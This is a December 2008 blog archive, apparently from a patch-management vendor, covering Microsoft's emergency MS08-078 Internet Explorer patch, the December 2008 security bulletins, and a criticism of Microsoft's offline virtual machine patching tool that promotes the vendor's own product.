Archive for December, 2008

MS08-078 Emergency IE patch

Microsoft’s latest IE out of band patch release needs to be installed right away. The number of infected websites is growing at an alarming rate – even people visiting legitimate websites are getting hacked with this exploit. Patch it now – just do it.

Why did this come out as an out of band release? It looks like Microsoft was informed of the IE zero day at the same time as everyone else – namely, last Tuesday (patch Tuesday). Based on Microsoft MSRC blog posts, starting on Tuesday, Microsoft studied the exploit and reviewed source code and determined that it impacted all versions of IE. From that point on, it can be assumed that Microsoft has been working quickly on a patch for all versions of IE.

Microsoft had to determine how serious the issue was – as that gave them guidance as to whether or not to release an out of band patch or wait until the next monthly cycle. By late last week, Microsoft was aware that this issue was starting to infect user’s systems at a faster rate than they’ve seen with past zero day exploits. Specifically, attackers were loading the exploit on legitimate websites so that even users who visit only non-nefarious websites might also get infected. Based on this level of data, it’s my belief that Microsoft decided the issue warranted an out of band patch release.

Researching, fixing, testing, and releasing a security patch within an eight day window is an incredible feat – especially given the need to support all versions of IE across all platforms and languages. This is an ‘all hands on deck’ response from Microsoft – I don’t think we’ll see this as the norm for less critical patches in the future as it is quite disruptive to their own processes.

Now, it’s equally as important for customers to roll out this patch to all of their systems as soon as possible. I’d bet you a cookie that many companies can’t get it rolled out as quickly as Microsoft got it built.


Leave a comment »

Internet Explorer Zero Day Mass Hysteria

An article was posted online today at a tech publication that mentions the Internet Explorer zero-day vulnerability and includes suggestions from un-named security experts to ‘switch to an alternative internet browser, such as Firefox or Google Chrome.’

This is all overblown.

Yes, an unpatched security vulnerability exists in Internet Explorer. Yes, it’s being actively exploited on the Internet, and Yes, even visiting legitimate websites can lead to compromise*.

No, this isn’t very different than previously announced zero day exploits (except we’re seeing a wider distribution of the exploit and more machines being hacked.) No, the world isn’t coming to an end, and No, you don’t need to change your browser.

ZDNet security bloggers are claming that Microsoft is on target to release an out-of-band security patch for this IE issue as early as tomorrow (December 17th). When it is released, install the patch. Until then, read the workarounds posted by Microsoft to help protect yourself from this issue.

While you’re at it, install all the other security patches that may be missing on your system. One unpatched issue on your system is equal to a zero-day flaw that may be exploited on the Internet. Unless you’re fully patched, you’re not patched at all.

* Hackers are planting the exploit on non-nefarious websites via SQL injection techniques. This means that visiting supposedly safe websites can lead to compromise via this IE flaw. These ‘legit’ websites have even bigger issues, as this means attackers were able to exploit poor SQL coding practices on these sites that enables hackers to inject evil code on the websites.

Leave a comment »

December 2008 patch day

Microsoft has released 8 security bulletins today, 6 of which are rated Critical. However, it’s the non Critical patches that are more interesting this month – we’ll get to those in a minute.

The first 5 bulletins are all ‘client-side’ vulnerabilities. This means a user’s computer can be exploited if they visit an evil website or open a malicious document. Applications which are vulnerable to this evil content include: Active-X controls (part of your browser), graphic images (hosted on websites or in documents), Word, Outlook, Excel, and Internet Explorer. In most cases, the new patches replaces older security patches released earlier in 2008.

The 6th bulletin (MS08-075) is specific to Windows Vista and Windows Server 2008, and is a variant of an attack that was discussed and patched in July of 2008. In this case, saving and executing an evil windows search file can lead to your system being compromised. Not many people typically do this, so I consider this low risk. Why Microsoft didn’t catch this variant back in July, I’ll never know.

The 7th bulletin released this month (MS08-076) is very interesting and is closely related to a security patch from last month – MS08-068. This new flaw enables attackers to gain access to your computer password and allows them to remotely access your system without your knowledge. This can happen if you click on an evil URL related to Windows Media items (typically audio and/or video clips). In this scenario, when a user clicks on an evil link, their password, or representations of their password, are sent to an evil server where the attacker can replay these credentials to log back on to the user’s computer. It’s similar to the 08-068 attack (credential reply), but uses different communication mechanisms to logon to the computers. Microsoft says that windows media player doesn’t play by the same rules as the Operating System, and that’s why this issue wasn’t fixed in the November patch release. This issue could become very serious if attackers figure out how to create the evil URLs. I’d get this one patched right away (even though Microsoft only rates this as Important).

The last bulletin for this month (MS08-077) relates to SharePoint 2008 and Search Server 2008. A flaw exists in the security controls of these applications that might allow users to access parts of the Sharepoint or Search servers and execute some administrative tasks. These tasks, while not allowing users direct access to protected information, could cause the server to stop responding to legitimate requests, or could provide additional information to attackers, such as email addresses of the users on the system.

I’d recommend patching MS08-076, as well as MS08-070 through 75, as soon as possible. Corporations and hosting services that use Sharepoint 2007 should install MS08-077 as soon as they can.

Leave a comment »

Microsoft offline virtual patching not really ‘offline’

Microsoft has released an updated version of what they call their ‘offline virtual machine servicing tool’. This tool is intended to aid administrators in patching Microsoft Virtual Machines that are currently offline (turned off).

Microsoft makes a good case for the need to patch offline VM images – something that Shavlik has been saying for quite a while: “Offline machines do not automatically receive operating system, antivirus, or application updates that would keep them compliant with current IT policy. An out-of-date virtual machine may pose a risk to the IT environment. If deployed and started, the out-of-date virtual machine might be vulnerable to attack or could be capable of attacking other network resources. Therefore, IT groups must take measures to ensure that offline virtual machines remain up-to-date and compliant.”

Microsoft states that their solution can patch the offline images. If you look deeper at their solution, however, you find that this isn’t really the case. As Microsoft continues: “At present, these measures involve temporarily bringing the virtual machine online, applying the necessary updates, and then storing it again.”

Wow. This isn’t offline patching. This is called ‘online patching’. The Microsoft solution moves the offline image to another server, launches the image (turns it on), has the image checking with a WSUS or SCCM server, performs an online patch assessment and an online patch copy and deployment. When done, it turns the image off and moves it back to the original image repository.

How is this offline patching? Rather than leveraging efficiencies gained from evaluating the offline image, the Microsoft solution requires the administrator to launch each of the VM images, scan them, patch them, and turn them off. This requires CPU and memory for each VM, additional servers, storage, and networks to move and launch the VM in a private network, and more time to launch the VM before it can even be assessed.

According to Microsoft’s documentation, their solution “brings groups of virtual machines online just long enough for them to receive updates from either System Center Configuration Manager 2007 or Windows Server Update Services. As soon as the virtual machines are up-to-date, the tool returns them to the offline state in the Virtual Machine Manager library.”

By contrast, the Shavlik solution doesn’t require the VM images to be turned on in order to perform a patch assessment. The Shavlik engine scans the offline image when it is turned off – a true offline solution. Shavlik’s scan function doesn’t require that the image be moved to another system or network and doesn’t require that the image be turned on. This approach saves both time and hardware and allows for scanning a much larger number of images in less time. Additionally, the Shavlik solution can scan and patch many more applications (both Microsoft and third party) than Microsoft’s WSUS and SCCM solution.

As an IT administrator, I’d prefer to understand the patch status before I turn on the image. I’d also like to prep all the patches for installation on the image before turning it on. Then, when I do turn on the image, the patches can install right away. By copying the patches to the system when it’s offline, we’ve eliminated the time needed to download the patches to each image after it’s turned on.

To protect unpatched systems from being hacked when turned on (and before patch installation) the administrator can launch the VM images in a ‘network disconnected’ state. Once the patches have been installed and the system rebooted, it can be joined back to the network. (Microsoft accomplishes this protection by launching the VM image on a private internal network.) Future versions of Shavlik’s solution will automate the ‘network disconnection’ process when launching the VM image in order to install the patches.

Shavlik’s solution is unique in the marketplace. I’m not aware of any other solution (aside from VMware’s solution which leverages Shavlik’s scan engine) that can truly perform patch assessment and prep deployment against offline VM images.

Leave a comment »